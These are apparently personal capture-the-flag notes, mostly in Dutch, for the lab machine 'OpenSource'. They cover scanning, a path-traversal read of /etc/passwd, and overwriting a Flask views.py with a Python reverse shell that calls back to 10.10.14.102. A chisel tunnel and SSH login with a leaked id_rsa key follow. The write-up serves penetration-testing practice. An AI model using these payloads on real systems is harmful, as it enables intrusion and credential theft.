$ nmap -sC -sV 10.10.11.164 -oA nmap/OpenSource                
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-21 15:34 EDT
Nmap scan report for 10.10.11.164
Host is up (0.023s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
|   256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_  256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp   open     http    Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Fri, 21 Oct 2022 19:34:58 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5316
|     Connection: close
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>upcloud - Upload files for Free!</title>
|     <script src="/static/vendor/jquery/jquery-3.4.1.min.js"></script>
|     <script src="/static/vendor/popper/popper.min.js"></script>
|     <script src="/static/vendor/bootstrap/js/bootstrap.min.js"></script>
|     <script src="/static/js/ie10-viewport-bug-workaround.js"></script>
|     <link rel="stylesheet" href="/static/vendor/bootstrap/css/bootstrap.css"/>
|     <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-grid.css"/>
|     <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-reboot.css"/>
|     <link rel=
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Fri, 21 Oct 2022 19:34:58 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|     Connection: close
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
|_http-title: upcloud - Upload files for Free!
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
3000/tcp filtered ppp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.92%I=7%D=10/21%Time=6352F463%P=x86_64-pc-linux-gnu%r(Get
SF:Request,1573,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.1\.2\x20
SF:Python/3\.10\.3\r\nDate:\x20Fri,\x2021\x20Oct\x202022\x2019:34:58\x20GM
SF:T\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2
SF:05316\r\nConnection:\x20close\r\n\r\n<html\x20lang=\"en\">\n<head>\n\x2
SF:0\x20\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x20\x20\x20<meta\x20name
SF:=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">
SF:\n\x20\x20\x20\x20<title>upcloud\x20-\x20Upload\x20files\x20for\x20Free
SF:!</title>\n\n\x20\x20\x20\x20<script\x20src=\"/static/vendor/jquery/jqu
SF:ery-3\.4\.1\.min\.js\"></script>\n\x20\x20\x20\x20<script\x20src=\"/sta
SF:tic/vendor/popper/popper\.min\.js\"></script>\n\n\x20\x20\x20\x20<scrip
SF:t\x20src=\"/static/vendor/bootstrap/js/bootstrap\.min\.js\"></script>\n
SF:\x20\x20\x20\x20<script\x20src=\"/static/js/ie10-viewport-bug-workaroun
SF:d\.js\"></script>\n\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20hre
SF:f=\"/static/vendor/bootstrap/css/bootstrap\.css\"/>\n\x20\x20\x20\x20<l
SF:ink\x20rel=\"stylesheet\"\x20href=\"\x20/static/vendor/bootstrap/css/bo
SF:otstrap-grid\.css\"/>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"\x20/static/vendor/bootstrap/css/bootstrap-reboot\.css\"/>\n\n\x2
SF:0\x20\x20\x20<link\x20rel=")%r(HTTPOptions,C7,"HTTP/1\.1\x20200\x20OK\r
SF:\nServer:\x20Werkzeug/2\.1\.2\x20Python/3\.10\.3\r\nDate:\x20Fri,\x2021
SF:\x20Oct\x202022\x2019:34:58\x20GMT\r\nContent-Type:\x20text/html;\x20ch
SF:arset=utf-8\r\nAllow:\x20OPTIONS,\x20HEAD,\x20GET\r\nContent-Length:\x2
SF:00\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HT
SF:ML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\
SF:x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-eq
SF:uiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x
SF:20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>
SF:Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20cod
SF:e:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20re
SF:quest\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x2
SF:0Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x2
SF:0\x20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.89 seconds
ports:
22      ssh
80      http
3000    ppp (filterd)
site enumeration: 
try upcloud -> download geeft een source.zip
/upcloud geeft mogelijkheid om een bestand te uploaden
gobuster ->
dir:
gobuster dir -u http://10.10.11.164/ -w /usr/share/wordlists/dirb/big.txt                  
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.164/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/21 16:06:26 Starting gobuster in directory enumeration mode
===============================================================
/console              (Status: 200) [Size: 1563]
/download             (Status: 200) [Size: 2489147]
                                                   
===============================================================
2022/10/21 16:08:34 Finished
===============================================================
gobuster vhost -u http://10.10.11.164/ -w /usr/share/wordlists/subdomains-top1million-110000.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://10.10.11.164/
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/wordlists/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/10/21 16:07:07 Starting gobuster in VHOST enumeration mode
===============================================================
                                  
===============================================================
2022/10/21 16:18:26 Finished
===============================================================
de console is pin protected
de download geeft de zip die al gevonden was
de source map heeft:
app  build-docker.sh  config  Dockerfile  .git
we kunnen de git files bekijken om te zien of daar interessante informatie zien.
commit: a76f8f75f7a4a12b706b0cf9c983796fa1985820
deze commit maakt een bestand aan app/.vscode/settings.json
in dit bestand zit een wachtwoord voor dev01.
        dev01:Soulless_Developer#2022
een ssh gaat niet zonder gebruik van een key.
als een bestand geupload wordt dan wordt er verwezen naar /uploads
door .......//// kunnen we path traversal doen. Hieruit kunnen we /etc/passwd halen. 
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
de docker container heeft alleen een root.
in views.py kan volgende methode gexploit worden -> os.path.join()
door een file naam in te geven met een absolut path. door een foutief path in te geven weten we dat /app/public/uploads/ de plaats is waar de bestanden geupload worden. -> /app/app/views.py is dan het views bestand. Dit kan gecontrolleerd worden door: http://10.10.11.164/uploads/......////app/app/views.py
we kunnen dit bestand overschijden vb. in de app.route('/donwload') om in plaats van een zip te downloaden een zip te downloaden een een reverse shell op te zetten. 
de downloads functie wordt aangepast naar ->
@app.route('/download')
def download():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.14.102", 9000))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn("sh")
    return "test"
Dit wordt dan geupload naar /app/app/views.py. En geeft een reverse shell.
aangezien we in een Docker omgeving zitten moeten we hieruit geraken. Vanuit de nmap scan weten we dat er iets op poort 3000 draait maar dit is filterd.
met een wget zien we dat het een gittea is. We kunnen met chisel een tunnel leggen tussen de container en de vm.
vm ->           ./chisel server --port 8001 --reverse
container ->    ./chisel client 10.10.14.102:8001 R:socks
in foxyproxy een nieuwe proxy maken 127.0.0.1:1080 (socks proxy aanvinken)
we kunnen nu aan gittea en we kunnen hier inloggen met de login die we gevonden hadden in de git commit.
(dev01:Soulless_Developer#2022)
Hier is een home-backup repository met daarin een bestand id_rsa.
we maken een copy naar onze locale machine 
        vi id_rsa 
        chmod 600 id_rsa 
        ssh -i id_rsa dev01@10.10.11.164
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-176-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Fri Oct 21 22:18:05 UTC 2022
  System load:  0.07              Processes:              219
  Usage of /:   76.1% of 3.48GB   Users logged in:        0
  Memory usage: 26%               IP address for eth0:    10.10.11.164
  Swap usage:   0%                IP address for docker0: 172.17.0.1
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
16 updates can be applied immediately.
9 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Mon May 16 13:13:33 2022 from 10.10.14.23
dev01@opensource:~$ 
dev01@opensource:~$ sudo -l
[sudo] password for dev01: 
Sorry, user dev01 may not run sudo on opensource.
geen sudo rechten voor dev01 op opensource.
